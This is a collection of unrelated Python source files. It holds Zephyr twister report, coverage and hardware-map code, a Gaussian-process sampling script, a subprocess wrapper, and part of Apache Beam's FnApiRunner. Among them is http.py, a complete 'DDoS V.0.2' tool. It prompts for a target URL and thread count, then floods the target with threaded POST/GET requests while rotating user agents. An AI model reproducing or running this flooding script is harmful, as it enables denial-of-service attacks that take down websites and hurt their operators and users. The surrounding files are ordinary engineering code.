classname = p + ":" + ".".join(instance.testcase.name.split(".")[:2])
# remove testcases that are being re-run from existing reports
for tc in eleTestsuite.findall(f'testcase/[@classname="{classname}"][@name="{instance.testcase.name}"]'):
eleTestsuite.remove(tc)
eleTestcase = ET.SubElement(eleTestsuite, 'testcase',
classname=classname,
name="%s" % (instance.testcase.name),
time="%f" % handler_time)
if instance.status in ["error", "failed", "timeout", "flash_error"]:
failure = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message=instance.reason)
log_root = ("%s/%s/%s" % (self.outdir, instance.platform.name, instance.testcase.name))
bl = os.path.join(log_root, "build.log")
hl = os.path.join(log_root, "handler.log")
log_file = bl
if instance.reason != 'Build error':
if os.path.exists(hl):
log_file = hl
else:
log_file = bl
failure.text = self.process_log(log_file)
elif instance.status == "skipped":
ET.SubElement(eleTestcase, 'skipped', type="skipped", message="Skipped")
result = ET.tostring(eleTestsuites)
with open(filename, 'wb') as report:
report.write(result)
return fails, passes, errors, skips
def csv_report(self, filename):
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "status",
"extra_args", "handler", "handler_time", "ram_size",
"rom_size"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance in self.instances.values():
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"extra_args": " ".join(instance.testcase.extra_args),
"handler": instance.platform.simulation}
rowdict["status"] = instance.status
if instance.status not in ["error", "failed", "timeout"]:
if instance.handler:
rowdict["handler_time"] = instance.metrics.get("handler_time", 0)
ram_size = instance.metrics.get("ram_size", 0)
rom_size = instance.metrics.get("rom_size", 0)
rowdict["ram_size"] = ram_size
rowdict["rom_size"] = rom_size
cw.writerow(rowdict)
def json_report(self, filename, append=False, version="NA"):
logger.info(f"Writing JSON report {filename}")
report = {}
selected = self.selected_platforms
report["environment"] = {"os": os.name,
"zephyr_version": version,
"toolchain": self.get_toolchain()
}
json_data = {}
if os.path.exists(filename) and append:
with open(filename, 'r') as json_file:
json_data = json.load(json_file)
suites = json_data.get("testsuites", [])
if suites:
suite = suites[0]
testcases = suite.get("testcases", [])
else:
suite = {}
testcases = []
for p in selected:
inst = self.get_platform_instances(p)
for _, instance in inst.items():
testcase = {}
handler_log = os.path.join(instance.build_dir, "handler.log")
build_log = os.path.join(instance.build_dir, "build.log")
device_log = os.path.join(instance.build_dir, "device.log")
handler_time = instance.metrics.get('handler_time', 0)
ram_size = instance.metrics.get("ram_size", 0)
rom_size = instance.metrics.get("rom_size", 0)
for k in instance.results.keys():
testcases = list(filter(lambda d: not (d.get('testcase') == k and d.get('platform') == p), testcases ))
testcase = {"testcase": k,
"arch": instance.platform.arch,
"platform": p,
}
if ram_size:
testcase["ram_size"] = ram_size
if rom_size:
testcase["rom_size"] = rom_size
if instance.results[k] in ["PASS"]:
testcase["status"] = "passed"
if instance.handler:
testcase["execution_time"] = handler_time
elif instance.results[k] in ['FAIL', 'BLOCK'] or instance.status in ["error", "failed", "timeout"]:
testcase["status"] = "failed"
testcase["reason"] = instance.reason
testcase["execution_time"] = handler_time
if os.path.exists(handler_log):
testcase["test_output"] = self.process_log(handler_log)
elif os.path.exists(device_log):
testcase["device_log"] = self.process_log(device_log)
else:
testcase["build_log"] = self.process_log(build_log)
else:
testcase["status"] = "skipped"
testcase["reason"] = instance.reason
testcases.append(testcase)
suites = [ {"testcases": testcases} ]
report["testsuites"] = suites
with open(filename, "wt") as json_file:
json.dump(report, json_file, indent=4, separators=(',',':'))
def get_testcase(self, identifier):
results = []
for _, tc in self.testcases.items():
for case in tc.cases:
if case == identifier:
results.append(tc)
return results
class CoverageTool:
""" Base class for every supported coverage tool
"""
def __init__(self):
self.gcov_tool = None
self.base_dir = None
@staticmethod
def factory(tool):
if tool == 'lcov':
t = Lcov()
elif tool == 'gcovr':
t = Gcovr()
else:
logger.error("Unsupported coverage tool specified: {}".format(tool))
return None
logger.debug(f"Select {tool} as the coverage tool...")
return t
@staticmethod
def retrieve_gcov_data(input_file):
logger.debug("Working on %s" % input_file)
extracted_coverage_info = {}
capture_data = False
capture_complete = False
with open(input_file, 'r') as fp:
for line in fp.readlines():
if re.search("GCOV_COVERAGE_DUMP_START", line):
capture_data = True
continue
if re.search("GCOV_COVERAGE_DUMP_END", line):
capture_complete = True
break
# Loop until the coverage data is found.
if not capture_data:
continue
if line.startswith("*"):
sp = line.split("<")
if len(sp) > 1:
# Remove the leading delimiter "*"
file_name = sp[0][1:]
# Remove the trailing new line char
hex_dump = sp[1][:-1]
else:
continue
else:
continue
extracted_coverage_info.update({file_name: hex_dump})
if not capture_data:
capture_complete = True
return {'complete': capture_complete, 'data': extracted_coverage_info}
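# Illustrative note (not part of the original file): the console-log shape that
# retrieve_gcov_data() expects, inferred from the parsing above; the file name and
# hex payload are made up.
#     GCOV_COVERAGE_DUMP_START
#     *path/to/object.gcda<0102abcd...
#     GCOV_COVERAGE_DUMP_END
# Each "*"-prefixed line is split on "<": the part before it (minus the leading "*")
# becomes the gcda file name, and the rest of the line (minus the trailing newline)
# is the hex dump that create_gcda_files() later writes out with bytes.fromhex().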
@staticmethod
def create_gcda_files(extracted_coverage_info):
logger.debug("Generating gcda files")
for filename, hexdump_val in extracted_coverage_info.items():
# gcovr fails if kobject_hash is included in the coverage data,
# so skip it; this is only a problem with gcovr v4.1
if "kobject_hash" in filename:
filename = (filename[:-4]) + "gcno"
try:
os.remove(filename)
except Exception:
pass
continue
with open(filename, 'wb') as fp:
fp.write(bytes.fromhex(hexdump_val))
def generate(self, outdir):
for filename in glob.glob("%s/**/handler.log" % outdir, recursive=True):
gcov_data = self.__class__.retrieve_gcov_data(filename)
capture_complete = gcov_data['complete']
extracted_coverage_info = gcov_data['data']
if capture_complete:
self.__class__.create_gcda_files(extracted_coverage_info)
logger.debug("Gcov data captured: {}".format(filename))
else:
logger.error("Gcov data capture incomplete: {}".format(filename))
with open(os.path.join(outdir, "coverage.log"), "a") as coveragelog:
ret = self._generate(outdir, coveragelog)
if ret == 0:
logger.info("HTML report generated: {}".format(
os.path.join(outdir, "coverage", "index.html")))
class Lcov(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('*' + pattern + '*')
def add_ignore_directory(self, pattern):
self.ignores.append('*/' + pattern + '/*')
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.info")
ztestfile = os.path.join(outdir, "ztest.info")
cmd = ["lcov", "--gcov-tool", self.gcov_tool,
"--capture", "--directory", outdir,
"--rc", "lcov_branch_coverage=1",
"--output-file", coveragefile]
cmd_str = " ".join(cmd)
logger.debug(f"Running {cmd_str}...")
subprocess.call(cmd, stdout=coveragelog)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--extract",
coveragefile,
os.path.join(self.base_dir, "tests", "ztest", "*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--remove",
ztestfile,
os.path.join(self.base_dir, "tests/ztest/test/*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
for i in self.ignores:
subprocess.call(
["lcov", "--gcov-tool", self.gcov_tool, "--remove",
coveragefile, i, "--output-file",
coveragefile, "--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
# The --ignore-errors source option is added to keep genhtml from exiting due to
# samples/application_development/external_lib/
return subprocess.call(["genhtml", "--legend", "--branch-coverage",
"--ignore-errors", "source",
"-output-directory",
os.path.join(outdir, "coverage")] + files,
stdout=coveragelog)
class Gcovr(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('.*' + pattern + '.*')
def add_ignore_directory(self, pattern):
self.ignores.append(".*/" + pattern + '/.*')
@staticmethod
def _interleave_list(prefix, list):
tuple_list = [(prefix, item) for item in list]
return [item for sublist in tuple_list for item in sublist]
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.json")
ztestfile = os.path.join(outdir, "ztest.json")
excludes = Gcovr._interleave_list("-e", self.ignores)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
cmd = ["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-e", "tests/*"] + excludes + ["--json", "-o",
coveragefile, outdir]
cmd_str = " ".join(cmd)
logger.debug(f"Running {cmd_str}...")
subprocess.call(cmd, stdout=coveragelog)
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-f", "tests/ztest", "-e",
"tests/ztest/test/*", "--json", "-o", ztestfile,
outdir], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
subdir = os.path.join(outdir, "coverage")
os.makedirs(subdir, exist_ok=True)
tracefiles = self._interleave_list("--add-tracefile", files)
return subprocess.call(["gcovr", "-r", self.base_dir, "--html",
"--html-details"] + tracefiles +
["-o", os.path.join(subdir, "index.html")],
stdout=coveragelog)
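# Illustrative note (not part of the original file): what _interleave_list() produces,
# i.e. how the repeated "-e"/"--add-tracefile" gcovr flags above are assembled.
# The patterns are made up.
#     Gcovr._interleave_list("-e", [".*generated.*", ".*tests/.*"])
#     -> ["-e", ".*generated.*", "-e", ".*tests/.*"]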
class DUT(object):
def __init__(self,
id=None,
serial=None,
platform=None,
product=None,
serial_pty=None,
connected=False,
pre_script=None,
post_script=None,
post_flash_script=None,
runner=None):
self.serial = serial
self.platform = platform
self.serial_pty = serial_pty
self._counter = Value("i", 0)
self._available = Value("i", 1)
self.connected = connected
self.pre_script = pre_script
self.id = id
self.product = product
self.runner = runner
self.fixtures = []
self.post_flash_script = post_flash_script
self.post_script = post_script
self.pre_script = pre_script
self.probe_id = None
self.notes = None
self.lock = Lock()
self.match = False
@property
def available(self):
with self._available.get_lock():
return self._available.value
@available.setter
def available(self, value):
with self._available.get_lock():
self._available.value = value
@property
def counter(self):
with self._counter.get_lock():
return self._counter.value
@counter.setter
def counter(self, value):
with self._counter.get_lock():
self._counter.value = value
def to_dict(self):
d = {}
exclude = ['_available', '_counter', 'match']
v = vars(self)
for k in v.keys():
if k not in exclude and v[k]:
d[k] = v[k]
return d
def __repr__(self):
return f"<{self.platform} ({self.product}) on {self.serial}>"
class HardwareMap:
schema_path = os.path.join(ZEPHYR_BASE, "scripts", "schemas", "twister", "hwmap-schema.yaml")
manufacturer = [
'ARM',
'SEGGER',
'MBED',
'STMicroelectronics',
'Atmel Corp.',
'Texas Instruments',
'Silicon Labs',
'NXP Semiconductors',
'Microchip Technology Inc.',
'FTDI',
'Digilent'
]
runner_mapping = {
'pyocd': [
'DAPLink CMSIS-DAP',
'MBED CMSIS-DAP'
],
'jlink': [
'J-Link',
'J-Link OB'
],
'openocd': [
'STM32 STLink', '^XDS110.*', 'STLINK-V3'
],
'dediprog': [
'TTL232R-3V3',
'MCP2200 USB Serial Port Emulator'
]
}
def __init__(self):
self.detected = []
self.duts = []
def add_device(self, serial, platform, pre_script, is_pty):
device = DUT(platform=platform, connected=True, pre_script=pre_script)
if is_pty:
device.serial_pty = serial
else:
device.serial = serial
self.duts.append(device)
def load(self, map_file):
hwm_schema = scl.yaml_load(self.schema_path)
duts = scl.yaml_load_verify(map_file, hwm_schema)
for dut in duts:
pre_script = dut.get('pre_script')
post_script = dut.get('post_script')
post_flash_script = dut.get('post_flash_script')
platform = dut.get('platform')
id = dut.get('id')
runner = dut.get('runner')
serial = dut.get('serial')
product = dut.get('product')
fixtures = dut.get('fixtures', [])
new_dut = DUT(platform=platform,
product=product,
runner=runner,
id=id,
serial=serial,
connected=serial is not None,
pre_script=pre_script,
post_script=post_script,
post_flash_script=post_flash_script)
new_dut.fixtures = fixtures
new_dut.counter = 0
self.duts.append(new_dut)
def scan(self, persistent=False):
from serial.tools import list_ports
if persistent and platform.system() == 'Linux':
# On Linux, /dev/serial/by-id provides symlinks to
# '/dev/ttyACMx' nodes using names which are unique as
# long as manufacturers fill out USB metadata nicely.
#
# This creates a map from '/dev/ttyACMx' device nodes
# to '/dev/serial/by-id/usb-...' symlinks. The symlinks
# go into the hardware map because they stay the same
# even when the user unplugs / replugs the device.
#
# Some inexpensive USB/serial adapters don't result
# in unique names here, though, so use of this feature
# requires explicitly setting persistent=True.
by_id = Path('/dev/serial/by-id')
def readlink(link):
return str((by_id / link).resolve())
persistent_map = {readlink(link): str(link)
for link in by_id.iterdir()}
else:
persistent_map = {}
serial_devices = list_ports.comports()
logger.info("Scanning connected hardware...")
for d in serial_devices:
if d.manufacturer in self.manufacturer:
# TI XDS110 can have multiple serial devices for a single board
# assume endpoint 0 is the serial, skip all others
if d.manufacturer == 'Texas Instruments' and not d.location.endswith('0'):
continue
s_dev = DUT(platform="unknown",
id=d.serial_number,
serial=persistent_map.get(d.device, d.device),
product=d.product,
runner='unknown')
for runner, _ in self.runner_mapping.items():
products = self.runner_mapping.get(runner)
if d.product in products:
s_dev.runner = runner
continue
# Try regex matching
for p in products:
if re.match(p, d.product):
s_dev.runner = runner
s_dev.connected = True
self.detected.append(s_dev)
else:
logger.warning("Unsupported device (%s): %s" % (d.manufacturer, d))
def save(self, hwm_file):
# use existing map
self.detected.sort(key=lambda x: x.serial or '')
if os.path.exists(hwm_file):
with open(hwm_file, 'r') as yaml_file:
hwm = yaml.load(yaml_file, Loader=SafeLoader)
if hwm:
hwm.sort(key=lambda x: x['serial'] or '')
# disconnect everything
for h in hwm:
h['connected'] = False
h['serial'] = None
for _detected in self.detected:
for h in hwm:
if _detected.id == h['id'] and _detected.product == h['product'] and not _detected.match:
h['connected'] = True
h['serial'] = _detected.serial
_detected.match = True
new_duts = list(filter(lambda d: not d.match, self.detected))
new = []
for d in new_duts:
new.append(d.to_dict())
if hwm:
hwm = hwm + new
else:
hwm = new
with open(hwm_file, 'w') as yaml_file:
yaml.dump(hwm, yaml_file, Dumper=Dumper, default_flow_style=False)
self.load(hwm_file)
logger.info("Registered devices:")
self.dump()
else:
# create new file
dl = []
for _connected in self.detected:
platform = _connected.platform
id = _connected.id
runner = _connected.runner
serial = _connected.serial
product = _connected.product
d = {
'platform': platform,
'id': id,
'runner': runner,
'serial': serial,
'product': product
}
dl.append(d)
with open(hwm_file, 'w') as yaml_file:
yaml.dump(dl, yaml_file, Dumper=Dumper, default_flow_style=False)
logger.info("Detected devices:")
self.dump(detected=True)
def dump(self, filtered=[], header=[], connected_only=False, detected=False):
print("")
table = []
if detected:
to_show = self.detected
else:
to_show = self.duts
if not header:
header = ["Platform", "ID", "Serial device"]
for p in to_show:
platform = p.platform
connected = p.connected
if filtered and platform not in filtered:
continue
if not connected_only or connected:
table.append([platform, p.id, p.serial])
print(tabulate(table, headers=header, tablefmt="github"))
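# Minimal usage sketch (illustrative only): "HardwareMap" below stands in for the
# enclosing class's real name and "map.yaml" is a made-up path, but the
# scan -> save -> dump order matches the methods defined above.
#
#     hwm = HardwareMap()
#     hwm.scan(persistent=True)       # detect boards, prefer /dev/serial/by-id paths
#     hwm.save("map.yaml")            # merge detections into the persisted hardware map
#     hwm.dump(connected_only=True)   # print a table of the connected devices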
|
example.py
|
import threading
import matplotlib.pyplot as plt
import pickle
import time
import numpy as np
import cv2
import GaussianProcess
import util
from scipy import interpolate
plt.ion()
N = util.N
M = util.M
K = 2
# MAP = np.ones((N,M,K))/float(K)
MAP = lambda x, y: np.ones(K)/float(K)
# np.random.seed(0)
def Image_Classification_Thread(n = float('inf'), t=0.1):
print("YAY Image Classification Has Started!")
GaussianProcess.setup()
imageClassifier = pickle.load(open("Image_Classifier_Model.p", "rb"))
MAP = cv2.imread("MAP.png")
FEATURE_EXTRACTOR = lambda image: [image[:, :, 0].mean(), image[:, :, 1].mean(), image[:, :, 2].mean()]
i = 0
while i < n:
sample_location = (np.random.randint(0, N), np.random.randint(0, M))
image_sample = MAP[sample_location[0]*100:sample_location[0]*100+100,
sample_location[1]*100:sample_location[1]*100+100]
image_feature = FEATURE_EXTRACTOR(image_sample)
time.sleep(t)
P = imageClassifier.predict_proba(np.array([image_feature]))[0]
GaussianProcess.new_image(P, sample_location[0], sample_location[1])
i += 1
def Adaptive_Sampling_Thread():
print("YAY Adaptive Sampling Has Started!")
while True:
time.sleep(0.1)
global MAP
# MAP = GaussianProcess.get_image_map()
MAP = GaussianProcess.GPRegressor()
def main():
image = threading.Thread(name='image_class', target=Image_Classification_Thread)
sampling = threading.Thread(name='adaptive_sample', target=Adaptive_Sampling_Thread)
image.start()
sampling.start()
i = 0
while True:
plt.pause(1)
plt.clf()
MAP.visualize(0, file_path="images/yay{}.png".format(i))
i += 1
def experiment(a_options=np.linspace(0, 1, 11), b_options=range(1, 21), n=100):
"""
This function just finds optimal a and b values and plots the space
:param a_options: list options for a
:param b_options: list options for b
:param n: number of samples
:return: None
"""
np.random.seed(0)
Image_Classification_Thread(n, t=0)
data = np.zeros((len(a_options), len(b_options)))
min_NLL = float('inf')
optimal_params = (-1, -1)
for i, a in enumerate(a_options):
for j, b in enumerate(b_options):
MAP = GaussianProcess.get_image_map(a, b)
nll = util.get_NLL(MAP)
data[i, j] = nll
if nll < min_NLL:
optimal_params = (a, b)
min_NLL = nll
print("optimal a = {}, optimal b = {}".format(*optimal_params))
cm = plt.imshow(data)
plt.colorbar(cm)
plt.xticks(range(len(b_options)), b_options)
plt.yticks(range(len(a_options)), a_options)
plt.title("Negative Log Loss for values of a and b")
plt.xlabel("b")
plt.ylabel("a")
plt.show(block=True)
# experiment()
if __name__ == "__main__":
main()
|
async_task.py
|
import os
import subprocess
import threading
class AsyncTask:
encoding = "utf-8"
killed = False
proc = None
def __init__(self, command=["printf", "Hello"], cwd=None, output=print):
self.output = output
if self.proc is not None:
self.proc.terminate()
self.proc = None
self.proc = subprocess.Popen(
command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, cwd=cwd
)
self.killed = False
threading.Thread(target=self.read, args=(self.proc.stdout,)).start()
def enabled(self, kill=False):
if kill:
return self.proc is not None and self.proc.poll() is None
return False
def kill(self):
if self.proc:
self.killed = True
self.proc.terminate()
def read(self, handle):
chunk_size = 2 ** 13
out = b""
while True:
try:
data = os.read(handle.fileno(), chunk_size)
out += data
if len(data) == chunk_size:
continue
if data == b"" and out == b"":
raise IOError("EOF")
self.write(out.decode(self.encoding))
if data == b"":
raise IOError("EOF")
out = b""
except (UnicodeDecodeError) as e:
msg = "Error decoding output using %s - %s"
self.write(msg % (self.encoding, str(e)))
break
except (IOError):
if self.killed:
msg = "Cancelled"
else:
msg = "Finished"
self.write("\n[%s]" % msg)
break
def write(self, text):
self.output(text)
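# Minimal usage sketch (illustrative only; the command and the list-collecting
# callback are assumptions, not part of the original module). It runs a task,
# waits for the child process, and gives the reader thread a moment to flush.
if __name__ == "__main__":
    import time
    lines = []
    task = AsyncTask(command=["printf", "hello\nworld\n"], output=lines.append)
    task.proc.wait()      # wait for the child process to exit
    time.sleep(0.2)       # let the reader thread deliver the trailing "[Finished]" marker
    print("".join(lines))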
|
http.py
|
# Last Update: 18-09-2021, Author: Lusmaysh
import sys,os,random
R = "\33[31;1m";G = "\33[32;1m";Y = "\33[33;1m";
try:
from requests import *
from threading import Thread
from user_agent import generate_user_agent
except ImportError:
try:
os.system("pip3 install requests threaded user_agent")
except:
os.system("pip install requests threaded user_agent")
def main():
os.system("cls" if os.name=="nt" else "clear")
print(f"""{Y}■□■□■ {G}DDOS V.0.2 | By Lusmaysh {Y}■□■□■{G}\n
▓█████▄ ▓█████▄ ▒█████ ██████ {R}V.0.2{G}
▒██▀ ██▌▒██▀ ██▌▒██▒ ██▒▒██ ▒
░██ █▌░██ █▌▒██░ ██▒░ ▓██▄
░▓█▄ ▌░▓█▄ ▌▒██ ██░ ▒ ██▒
░▒████▓ ░▒████▓ ░ ████▓▒░▒██████▒▒
▒▒▓ ▒ ▒▒▓ ▒ ░ ▒░▒░▒░ ▒ ▒▓▒ ▒ ░
░ ▒ ▒ ░ ▒ ▒ ░ ▒ ▒░ ░ ░▒ ░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░
░ ░ ░ ░ ░
░ ░
""")
try:
url = input(f"root{R}@{G}ddos (Url) {Y}≽ {R}")
get(url)
print(f"{Y}[{R}✠{Y}] {G}OK")
except exceptions.ConnectionError:
sys.exit(f"{Y}[{R}✠{Y}] {R}Please Check Your Internet!")
except:
sys.exit(f"{Y}[{R}✠{Y}] {R}Url Not Exsist!")
try:
loop = int(input(f"{G}root{R}@{G}ddos (Threads) {Y}≽ {R}"))
print(f"{Y}[{R}✠{Y}] {G}OK")
except:
sys.exit(f"{Y}[{R}✠{Y}] {R}Invalid Threads!")
option = input(f"""
{Y}[{R}1{Y}] {G}Use One User-Agent Always
{Y}[{R}2{Y}] {G}Changing User-Agent For Each Cycle
{G}root{R}@{G}ddos (Option) {Y}≽ {R}""")
if option == "1" or option == "2":
print(f"{Y}[{R}✠{Y}] {G}OK")
else:
sys.exit(f"{Y}[{R}✠{Y}] {R}Invalid Option!")
start = input(f"""
{Y}[{R}✠{Y}] {G}Yes (y)
{Y}[{R}✠{Y}] {G}No (n)
{G}root{R}@{G}ddos (Start DDoS) {Y}≽ {R}""")
def ddos_mode1():
ua = generate_user_agent()
while True:
try:
headers = {'User-Agent': ua}
ddos = post(url=url, headers=headers)
ddos2 = get(url=url, headers=headers)
for x in range(loop):
thread = Thread(target=ddos_mode1, daemon=True)
thread.start()
url_check_status = get(url=url, headers=headers)
if url_check_status.status_code == 200:
print(f"{Y}[{R}✠{Y}] {G}DDoS Attack Is Running! URL Status Code: {url_check_status}")
else:
print(f"{Y}[{R}✠{Y}] {G}DDoS Attack Is Running! URL Status Code: {R}{url_check_status}")
except:
continue
def ddos_mode2():
while True:
try:
headers = {'User-Agent': generate_user_agent()}
ddos = post(url=url, headers=headers)
ddos2 = get(url=url, headers=headers)
for x in range(loop):
thread = Thread(target=ddos_mode2, daemon=True)
thread.start()
url_check_status = get(url=url, headers=headers)
if url_check_status.status_code == 200:
print(f"{Y}[{R}✠{Y}] {G}DDoS Attack Is Running! URL Status Code: {url_check_status}")
else:
print(f"{Y}[{R}✠{Y}] {G}DDoS Attack Is Running! URL Status Code: {R}{url_check_status}")
except:
continue
if start=="y" or start=="Y" or start=="yes" or start=="Yes" or start=="YES":
if option == "1":
ddos_mode1()
elif option == "2":
ddos_mode2()
else:
sys.exit(f"{Y}[{R}✠{Y}] {R}DDoS Attack Was Canceled!")
main()
|
fn_api_runner.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""A PipelineRunner using the SDK harness.
"""
import base64
import collections
import copy
import logging
import Queue as queue
import threading
import time
from concurrent import futures
import grpc
import apache_beam as beam # pylint: disable=ungrouped-imports
from apache_beam.coders import WindowedValueCoder
from apache_beam.coders import registry
from apache_beam.coders.coder_impl import create_InputStream
from apache_beam.coders.coder_impl import create_OutputStream
from apache_beam.internal import pickler
from apache_beam.io import iobase
from apache_beam.metrics.execution import MetricsEnvironment
from apache_beam.portability.api import beam_fn_api_pb2
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.portability.api import beam_runner_api_pb2
from apache_beam.runners import pipeline_context
from apache_beam.runners.portability import maptask_executor_runner
from apache_beam.runners.runner import PipelineState
from apache_beam.runners.worker import bundle_processor
from apache_beam.runners.worker import data_plane
from apache_beam.runners.worker import operation_specs
from apache_beam.runners.worker import sdk_worker
from apache_beam.transforms import trigger
from apache_beam.transforms.window import GlobalWindows
from apache_beam.utils import proto_utils
from apache_beam.utils import urns
# This module is experimental. No backwards-compatibility guarantees.
def streaming_rpc_handler(cls, method_name):
"""Un-inverts the flow of control between the runner and the sdk harness."""
class StreamingRpcHandler(cls):
_DONE = object()
def __init__(self):
self._push_queue = queue.Queue()
self._pull_queue = queue.Queue()
setattr(self, method_name, self.run)
self._read_thread = threading.Thread(target=self._read)
self._started = False
def run(self, iterator, context):
self._inputs = iterator
# Note: We only support one client for now.
self._read_thread.start()
self._started = True
while True:
to_push = self._push_queue.get()
if to_push is self._DONE:
return
yield to_push
def _read(self):
for data in self._inputs:
self._pull_queue.put(data)
def push(self, item):
self._push_queue.put(item)
def pull(self, timeout=None):
return self._pull_queue.get(timeout=timeout)
def empty(self):
return self._pull_queue.empty()
def done(self):
self.push(self._DONE)
# Can't join a thread before it's started.
while not self._started:
time.sleep(.01)
self._read_thread.join()
return StreamingRpcHandler()
class OldeSourceSplittableDoFn(beam.DoFn):
"""A DoFn that reads and emits an entire source.
"""
# TODO(robertwb): Make this a full SDF with progress splitting, etc.
def process(self, source):
if isinstance(source, iobase.SourceBundle):
for value in source.source.read(source.source.get_range_tracker(
source.start_position, source.stop_position)):
yield value
else:
# Dataflow native source
with source.reader() as reader:
for value in reader:
yield value
# See DataflowRunner._pardo_fn_data
OLDE_SOURCE_SPLITTABLE_DOFN_DATA = pickler.dumps(
(OldeSourceSplittableDoFn(), (), {}, [],
beam.transforms.core.Windowing(GlobalWindows())))
class _GroupingBuffer(object):
"""Used to accumulate groupded (shuffled) results."""
def __init__(self, pre_grouped_coder, post_grouped_coder, windowing):
self._key_coder = pre_grouped_coder.key_coder()
self._pre_grouped_coder = pre_grouped_coder
self._post_grouped_coder = post_grouped_coder
self._table = collections.defaultdict(list)
self._windowing = windowing
def append(self, elements_data):
input_stream = create_InputStream(elements_data)
while input_stream.size() > 0:
windowed_key_value = self._pre_grouped_coder.get_impl(
).decode_from_stream(input_stream, True)
key = windowed_key_value.value[0]
windowed_value = windowed_key_value.with_value(
windowed_key_value.value[1])
self._table[self._key_coder.encode(key)].append(windowed_value)
def __iter__(self):
output_stream = create_OutputStream()
trigger_driver = trigger.create_trigger_driver(self._windowing, True)
for encoded_key, windowed_values in self._table.items():
key = self._key_coder.decode(encoded_key)
for wkvs in trigger_driver.process_entire_key(key, windowed_values):
self._post_grouped_coder.get_impl().encode_to_stream(
wkvs, output_stream, True)
return iter([output_stream.get()])
class FnApiRunner(maptask_executor_runner.MapTaskExecutorRunner):
def __init__(self, use_grpc=False, sdk_harness_factory=None):
super(FnApiRunner, self).__init__()
self._last_uid = -1
self._use_grpc = use_grpc
if sdk_harness_factory and not use_grpc:
raise ValueError('GRPC must be used if a harness factory is provided.')
self._sdk_harness_factory = sdk_harness_factory
def has_metrics_support(self):
return False
def _next_uid(self):
self._last_uid += 1
return str(self._last_uid)
def run(self, pipeline):
MetricsEnvironment.set_metrics_supported(self.has_metrics_support())
if pipeline._verify_runner_api_compatible():
return self.run_via_runner_api(pipeline.to_runner_api())
else:
return super(FnApiRunner, self).run(pipeline)
def run_via_runner_api(self, pipeline_proto):
return self.run_stages(*self.create_stages(pipeline_proto))
def create_stages(self, pipeline_proto):
# First define a couple of helpers.
def union(a, b):
# Minimize the number of distinct sets.
if not a or a == b:
return b
elif not b:
return a
else:
return frozenset.union(a, b)
class Stage(object):
"""A set of Transforms that can be sent to the worker for processing."""
def __init__(self, name, transforms,
downstream_side_inputs=None, must_follow=frozenset()):
self.name = name
self.transforms = transforms
self.downstream_side_inputs = downstream_side_inputs
self.must_follow = must_follow
def __repr__(self):
must_follow = ', '.join(prev.name for prev in self.must_follow)
return "%s\n %s\n must follow: %s" % (
self.name,
'\n'.join(["%s:%s" % (transform.unique_name, transform.spec.urn)
for transform in self.transforms]),
must_follow)
def can_fuse(self, consumer):
def no_overlap(a, b):
return not a.intersection(b)
return (
self not in consumer.must_follow
and not self.is_flatten() and not consumer.is_flatten()
and no_overlap(self.downstream_side_inputs, consumer.side_inputs()))
def fuse(self, other):
return Stage(
"(%s)+(%s)" % (self.name, other.name),
self.transforms + other.transforms,
union(self.downstream_side_inputs, other.downstream_side_inputs),
union(self.must_follow, other.must_follow))
def is_flatten(self):
return any(transform.spec.urn == urns.FLATTEN_TRANSFORM
for transform in self.transforms)
def side_inputs(self):
for transform in self.transforms:
if transform.spec.urn == urns.PARDO_TRANSFORM:
payload = proto_utils.parse_Bytes(
transform.spec.payload, beam_runner_api_pb2.ParDoPayload)
for side_input in payload.side_inputs:
yield transform.inputs[side_input]
def has_as_main_input(self, pcoll):
for transform in self.transforms:
if transform.spec.urn == urns.PARDO_TRANSFORM:
payload = proto_utils.parse_Bytes(
transform.spec.payload, beam_runner_api_pb2.ParDoPayload)
local_side_inputs = payload.side_inputs
else:
local_side_inputs = {}
for local_id, pipeline_id in transform.inputs.items():
if pcoll == pipeline_id and local_id not in local_side_inputs:
return True
def deduplicate_read(self):
seen_pcolls = set()
new_transforms = []
for transform in self.transforms:
if transform.spec.urn == bundle_processor.DATA_INPUT_URN:
pcoll = only_element(transform.outputs.items())[1]
if pcoll in seen_pcolls:
continue
seen_pcolls.add(pcoll)
new_transforms.append(transform)
self.transforms = new_transforms
# Now define the "optimization" phases.
safe_coders = {}
def expand_gbk(stages):
"""Transforms each GBK into a write followed by a read.
"""
good_coder_urns = set(beam.coders.Coder._known_urns.keys()) - set([
urns.PICKLED_CODER])
coders = pipeline_components.coders
